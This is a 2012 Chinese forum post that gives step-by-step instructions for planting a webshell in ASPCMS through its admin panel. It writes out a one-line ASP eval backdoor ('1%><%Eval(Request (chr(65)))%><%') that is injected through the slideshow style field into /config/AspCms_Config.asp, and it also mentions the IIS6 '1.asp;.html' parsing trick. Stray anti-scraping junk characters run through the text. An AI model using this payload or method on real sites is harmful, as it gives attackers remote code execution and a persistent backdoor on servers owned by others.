aspcms在老版本中可以通过添加模板直接添加asp.但是新版的aspcms中已经限制了添加模板的格式为html,js,css,当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.可是如果遇到iis7.5呢?以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.6 ?3 A, Q4 e( ?; ^7 @& f
1、进入后台,“扩展功能”--“幻灯片设置”--”幻灯样式”2 |8 G9 w4 r2 [7 E
( D& h. x. H$ _9 W+ e
) s# L, i7 i5 q" |5 o
# N: f) K$ o, d6 g1 L5 m+ Z* ?% @$ C" X2、使用chorme的审查元素功能或者firefox的firebug,总之使用能修改当前页面元素的工具就好了。将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%
7 F/ y& J+ K$ y# c( d7 z- P) c1 W+ u
! n7 c/ g1 h. I, E- H. a6 }1 c3、一句话木马,密码a。在/config/AspCms_Config.asp
) h9 ?! l9 C& q6 U
9 r0 a8 p/ h4 j2 V+ P4 p1 v; o& C
/ h$ c; j2 q1 l4 t* y% V |
发表于 2012-11-9 20:55:05
收藏
支持
反对